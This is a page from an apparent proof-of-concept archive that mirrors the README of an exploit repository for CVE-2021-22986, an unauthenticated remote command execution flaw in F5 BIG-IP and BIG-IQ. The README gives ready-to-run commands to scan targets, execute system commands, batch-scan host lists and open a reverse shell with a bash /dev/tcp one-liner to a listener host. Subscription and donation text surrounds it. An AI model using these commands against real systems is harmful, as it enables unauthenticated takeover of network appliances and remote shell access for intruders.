Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2021-22986 PoC — F5 BIG-IP 代码问题漏洞

Source
https://github.com/amitlttwo/CVE-2021-22986
Associated Vulnerability
Title:F5 BIG-IP 代码问题漏洞 (CVE-2021-22986)
Description:On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.
Readme
## CVE-2021-22986

This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise. The BIG-IP system in Appliance mode is also vulnerable.

### Vuln Product

F5 BIG-IQ 6.0.0-6.1.0
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 16.0.0-16.0.1


### Usage

```
python3 CVE_2021_22986.py
```

### Finding Vulnerability
```
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
```

### Command Execution
```
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
```

### Executing Command with whoami
```
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
```

### Batch Scan
```
python3 CVE_2021_22986.py -s true -f check.txt
```

### Reverse Shell
```
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
```

### New PoC
```
python3 newpoc.py https://192.168.174.164
```

### References:-

* https://support.f5.com/csp/article/K03009991

* https://github.com/safesword/F5_RCE

* https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

* https://github.com/Udyz/CVE-2021-22986-SSRF2RCE
File Snapshot

 [4.0K]  /data/pocs/a8d56e48805b214f0a316a436a701e35cfea1b6b
├── [5.6K]  cve-2021-22986.py
├── [2.5M]  f5.rest.jar
├── [3.5K]  new-poc.py
└── [1.6K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →